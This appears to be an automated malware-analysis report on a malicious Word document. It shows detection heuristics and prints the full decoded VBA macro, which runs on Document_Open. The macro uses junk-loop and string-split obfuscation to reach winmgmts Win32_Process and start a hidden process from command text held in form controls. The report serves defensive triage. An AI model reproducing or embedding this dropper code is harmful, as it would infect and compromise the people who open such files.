MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7542511-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7542511-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Djaskuprkbbs = GetObject(Ntljqgdk) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11648 bytes |
SHA-256: fcd34509b952afc7027a7dc8063e972802622610f7865ee9118ddccdddd416d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
221 of 340 identifiers look randomly generated (e.g. 'roc9_msnnj883hn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Jfmzbhabwk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Fpiozzljznt
End Sub
Attribute VB_Name = "Xfezjsief"
Attribute VB_Base = "0{D9E414C6-B772-43AB-9F9B-D12CC5331B7A}{42BF737A-A082-4436-AC3F-607E3F15FC93}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Kzefggvwq"
Function Pphemutdlf()
Do While Aotwrnyamo = 999
Do While Pqqtozwjrynb = 67 + 344
Ikeunwfb = CLng(Wwhmvpteoexam)
Npdqcbrkq = Int(9116 + 44)
Vsbdmorqwss = CDate(QKoWc)
Bejmhdixooa = 1279 + Int(546)
Kvyflrhh = Chr(4806)
Dlriivtn = Sqr(1512) + Poyrednwq
Loop
Do While Awkewsrg = 33 + 5
Hhcgbpua = 234 + Int(34)
Bebmvxgahdlq = Chr(44)
Cphemdchuchgv = Sqr(55) + Otvombwu
Ylqyxrque = CLng(Ipoysukzeo)
Xtkpcawfviwns = Int(23 + 4)
Wkrlrgsgd = CDate(QKoWc)
Loop
Loop
Nhtemufnlke = ChrW(wdKeyP)
Do While Fkkbhdfw = 999
Do While Ututikdd = 67 + 344
Cqaepdlwsv = CLng(Lvbwgksjnlqbs)
Wchhygabpj = Int(9116 + 44)
Erjdhsuhzr = CDate(QKoWc)
Slwwqzym = 1279 + Int(546)
Ptlnktltmmay = Chr(4806)
Dhjjxskfqdpn = Sqr(1512) + Kpltxkcq
Loop
Do While Hbwfezduxdtj = 33 + 5
Owijciyxihi = 234 + Int(34)
Hadpmqpc = Chr(44)
Earauqgkbawea = Sqr(55) + Njvksowiyvtt
Tzmsadjlh = CLng(Cxhwecabx)
Urehhsteb = Int(23 + 4)
Eiakmzyicbrd = CDate(QKoWc)
Loop
Loop
Iavbeuddw = Nhtemufnlke + Xfezjsief.Vheoebmkjnj + Xfezjsief.Hfrcpeve
Do While Cfsuzxmf = 999
Do While Irbszjpnzmnri = 67 + 344
Zgqhvlxd = CLng(Ujyqexcqkr)
Suietiip = Int(9116 + 44)
Urarvyrkknoge = CDate(QKoWc)
Xvplaxgqxnw = 1279 + Int(546)
Spuybyphpmb = Chr(4806)
Agynmpinvmtdk = Sqr(1512) + Addyzarvspf
Loop
Do While Jhjnibwzsk = 33 + 5
Qcwcbvqya = 234 + Int(34)
Idezjlfxgi = Chr(44)
Odgvjcoi = Sqr(55) + Rixvtruo
Dvakdcnomm = CLng(Sziyvahwmytgl)
Orocsbpa = Int(23 + 4)
Wrhpavgh = CDate(QKoWc)
Loop
Loop
Fack = Xfezjsief.Tjpfeltday.Tag
Uztydwyzrkm = Split(Iavbeuddw + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Grtwtdcyv = 999
Do While Mgtdmrji = 67 + 344
Qunpbwblv = CLng(Levxckhuvak)
Tejtakpkabp = Int(9116 + 44)
Gsgbmaiqa = CDate(QKoWc)
Gkgbovegozvwn = 1279 + Int(546)
Kyclcfavdp = Chr(4806)
Ojxxsckmqdnw = Sqr(1512) + Iigkvsuaqjnpz
Loop
Do While Odmzcpxqb = 33 + 5
Duuhlghfwrot = 234 + Int(34)
Zntokddqgbaa = Chr(44)
Hlsfhapz = Sqr(55) + Xgitxpzkse
Ebrzqmos = CLng(Jfxkyjltga)
Rdvktrcqhs = Int(23 + 4)
Hrnijcknb = CDate(QKoWc)
Loop
Loop
Pphemutdlf = Cywhchmvtrjg + Join(Uztydwyzrkm, "") + Cywhchmvtrjg
Do While Udxyxbvlx = 999
Do While Wszlmdbtskxq = 67 + 344
Mhpxuhxvja = CLng(Lhephodl)
Xwtlzdgv = Int(9116 + 44)
Fmltgndlvb = CDate(QKoWc)
Ckruocdimgjik = 1279 + Int(546)
Ihtoodww = Chr(4806)
Ljtlrqavyuite = Sqr(1512) + Rozzddjo
Loop
Do While Dbmuvgosyctk = 33 + 5
Pinmxvpdelwp = 234 + Int(34)
Vtbvkqnpoacou = Chr(44)
Mkhrejvpx = Sqr(55) + Faxbxgjrxfb
Fhaumjjbowrap = CLng(Mzdefwlnrmcv)
Dbkmhlxj = Int(23 + 4)
Ngmrdfai = CDate(QKoWc)
Loop
Loop
End Function
Function Fpiozzljznt()
wen = "i9_msnnj883hn///9_msnnj883hn///n9_msnnj883hn///9_msnnj883hn///mg9_msnnj883hn///9_msnnj883hn///mt9_msnnj883hn///" + ChrW(wdKeyS) + ":win32_" + Xfezjsief.Sqwerbbgagu + "9_msnnj883hn///roc9_msnnj883hn///9_msnnj883hn///es9_msnnj883hn///9_msnnj883hn///s"
Do While Rxxnboasp = 999
Do While Gxhzmrsezdykk = 67 + 344
Fqyddxuupw = CLng(Ihtxlzgyyl)
Czzfdsmnlqj = Int(9116 + 44)
Mnxldscrejwf = CDate(QKoWc)
Kddmtuiaey = 1279 + Int(546)
Wjhbsyjdzmi = Chr(4806)
Ttyyqczxgcjie = Sqr(1512) + Mljywmwskdr
Loop
Do While Cnxuqqzajbnwp = 33 + 5
Hxsnitrnckq = 234 + Int(34)
Bovzeduteproq = Chr(44)
Kvcgsglm = Sqr(55) + Pclzukag
Ugorlzwcibzse = CLng(Hhjrqpbk)
Bitjeqhnpid = Int(23 + 4)
Vtjiejexxx = CDate(QKoWc)
Loop
Loop
ski = "9_msnnj883hn///"
Do While Uasxbfzv = 999
Do While Huvaxcvk = 67 + 344
Fxbsxoloyccct = CLng(Dkyuxllmcpipz)
Uizpxxzzz = Int(9116 + 44)
Lwqzfaudtsxq = CDate(QKoWc)
Tlycpylhri = 1279 + Int(546)
Ddzekyhd = Chr(4806)
Wdjivwmoxrl = Sqr(1512) + Laxkohde
Loop
Do While Dwqdoiyi = 33 + 5
Fputgcpvcl = 234 + Int(34)
Aanenotwwjo = Chr(44)
Lfsxgyjaq = Sqr(55) + Fddlsicwblwpp
Joopvavmvxwx = CLng(Tqjcrzjkhe)
Syupqdnko = Int(23 + 4)
Acwkriovlf = CDate(QKoWc)
Loop
Loop
Acbmrhdr = Split("9_msnnj883hn///9_msnnj883hn///9_msnnj883hn///w" + wen, ski)
Do While Kgatalgbjx = 999
Do While Ypaeftzbad = 67 + 344
Hydotgdyo = CLng(Xvavduwc)
Ifondhplaihrs = Int(9116 + 44)
Hridtjvd = CDate(QKoWc)
Iexvhdbm = 1279 + Int(546)
Sobqyomnmvfdo = Chr(4806)
Coyiomccjucrq = Sqr(1512) + Gehmjtqsf
Loop
Do While Hqrxfqdzepcew = 33 + 5
Mrvvwvvhpbv = 234 + Int(34)
Cmwtdqelkl = Chr(44)
Oqopdalasg = Sqr(55) + Jibmjcwjosxss
Fiebfgih = CLng(Slakbrwma)
Pscipfyvtvwv = Int(23 + 4)
Roetpbavf = CDate(QKoWc)
Loop
Loop
Ntljqgdk = Join(Acbmrhdr, "")
Do While Phrfpwrelr = 999
Do While Aojwhdvhety = 67 + 344
Iutwozcikd = CLng(Exmxjklam)
Ovmqxlevj = Int(9116 + 44)
Hbyhwsogploqd = CDate(QKoWc)
Kvjmuwmpeb = 1279 + Int(546)
Exfhliiqky = Chr(4806)
Tlffuzejkoa = Sqr(1512) + Wczumufvjk
Loop
Do While Ddhuqyluvt = 33 + 5
Guewsyqwxuo = 234 + Int(34)
Vyevsjawvq = Chr(44)
Oupoordsjnspi = Sqr(55) + Ummipbmuah
Jitkdjzd = CLng(Iidknzhg)
Pzgkjhgvcz = Int(23 + 4)
Potkpcogj = CDate(QKoWc)
Loop
Loop
Set Djaskuprkbbs = GetObject(Ntljqgdk)
Do While Awkrpmqohvdd = 999
Do While Yqqddvmow = 67 + 344
Sducrsdfz = CLng(Oktquagpy)
Gkhblzag = Int(9116 + 44)
Wmwjvmpcaxabp = CDate(QKoWc)
Jmblihpbp = 1279 + Int(546)
Uqhefsqjry = Chr(4806)
Yoqnygdeu = Sqr(1512) + Bmyudshkhllr
Loop
Do While Vrhlgkimfcxs = 33 + 5
Vmtpovfsgxmq = 234 + Int(34)
Qwnwqscovtn = Chr(44)
Phvxlyppus = Sqr(55) + Epdljypz
Jpabapgqabsip = CLng(Zarvyvdrtm)
Dluxwrtxgxkya = Int(23 + 4)
Rtkvzszk = CDate(QKoWc)
Loop
Loop
Pmfxazph = Ntljqgdk + ChrW(wdKeyS) + Xfezjsief.Hyasqpzzhka.ControlTipText$ + Xfezjsief.Catvxnecug.ControlTipText
Do While Ahtlzbitpvio = 999
Do While Gsxhbfuclljck = 67 + 344
Mmawptteluir = CLng(Juhquqtwkify)
Hcxqlyciirwgn = Int(9116 + 44)
Ntnljbqclq = CDate(QKoWc)
Pbrrrvww = 1279 + Int(546)
Rglqampuodgkw = Chr(4806)
Nourzlaewmgq = Sqr(1512) + Krrcqbhzs
Loop
Do While Mqbdvffc = 33 + 5
Hbfjkrbo = 234 + Int(34)
Wppemohgoknw = Chr(44)
Nvybbhbnabc = Sqr(55) + Tfjflohhxb
Gxyopqliswp = CLng(Nwrioobw)
Aeechlfptbk = Int(23 + 4)
Czkkrhtxpq = CDate(QKoWc)
Loop
Loop
Xxgawxijtrfrn = Pmfxazph + Xfezjsief.Sqwerbbgagu
Do While Egwfcbqplyku = 999
Do While Wtlxjpwn = 67 + 344
Icpdmneuqxzdo = CLng(Qxeakdhnysso)
Uwrsxxzl = Int(9116 + 44)
Xupdtcte = CDate(QKoWc)
Ssrncvbor = 1279 + Int(546)
Zbsvbikrbsek = Chr(4806)
Qoduwznb = Sqr(1512) + Ceeqbvkubj
Loop
Do While Xhrujnmonhqk = 33 + 5
Xuumgyejt = 234 + Int(34)
Upfhkire = Chr(44)
Vccpzoivuou = Sqr(55) + Ypzpcannovqo
Gdzyfpqbs = CLng(Hjwnzijqwhrlt)
Jdhgmacib = Int(23 + 4)
Qoocwxgtvqra = CDate(QKoWc)
Loop
Loop
Set Fpiozzljznt = GetObject(Xxgawxijtrfrn)
Do While Xhxuhttsoitbv = 999
Do While Syfmxokw = 67 + 344
Bdgkheko = CLng(Uugkkypgfq)
Ahqgvrahnlmqg = Int(9116 + 44)
Igeimergysv = CDate(QKoWc)
Zeqvycdytbjto = 1279 + Int(546)
Jipdukgzbhsui = Chr(4806)
Napbiiurremo = Sqr(1512) + Upyusxqcr
Loop
Do While Teonghuxbnj = 33 + 5
Broqyzhwrv = 234 + Int(34)
Taqdblihmpdg = Chr(44)
Wsqnqlllsa = Sqr(55) + Erzsbjhvmheua
Wamnhnmd = CLng(Dewghhpub)
Iunuzhzonwn = Int(23 + 4)
Plfnbmrojm = CDate(QKoWc)
Loop
Loop
Fpiozzljznt. _
showwindow = False
Do While Izpulqlq = 999
Do While Tngwpztlzdq = 67 + 344
Oisdffbudwub = CLng(Shjrvxjqc)
Saoadondhaltn = Int(9116 + 44)
Dtqqmulubd = CDate(QKoWc)
Uhjxgiemfm = 1279 + Int(546)
Igywdgov = Chr(4806)
Upalxdhfnw = Sqr(1512) + Swydfkit
Loop
Do While Zpifworupva = 33 + 5
Twulbfzzxof = 234 + Int(34)
Yabdmrfd = Chr(44)
Drgtoshrci = Sqr(55) + Glzhogqcb
Uprtmiiejclq = CLng(Mkgpwcftttpd)
Zmojazmd = Int(23 + 4)
Vitezcvvfmcvk = CDate(QKoWc)
Loop
Loop
Do While Djaskuprkbbs.Create(pok & Pphemutdlf, Osiocebbkbpo, Fpiozzljznt, Cptfqqwyeav)
Loop
Do While Ngwzjojcfda = 999
Do While Vjaibwpd = 67 + 344
Urjixkpauuww = CLng(Vcigeqwm)
Mkajcizke = Int(9116 + 44)
Hzfmrqdg = CDate(QKoWc)
Ylwmyojys = 1279 + Int(546)
Sdwmkfxlu = Chr(4806)
Lbnccunatggb = Sqr(1512) + Dwetpmlovowjz
Loop
Do While Fuxsfzvzvm = 33 + 5
Sebmciogjt = 234 + Int(34)
Ahxgygtuf = Chr(44)
Liiiyixihaa = Sqr(55) + Tctblbblct
Cpaosufdrpeta = CLng(Mkkezpnmwmrje)
Jpqkwswu = Int(23 + 4)
Vpsexabvc = CDate(QKoWc)
Loop
Loop
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.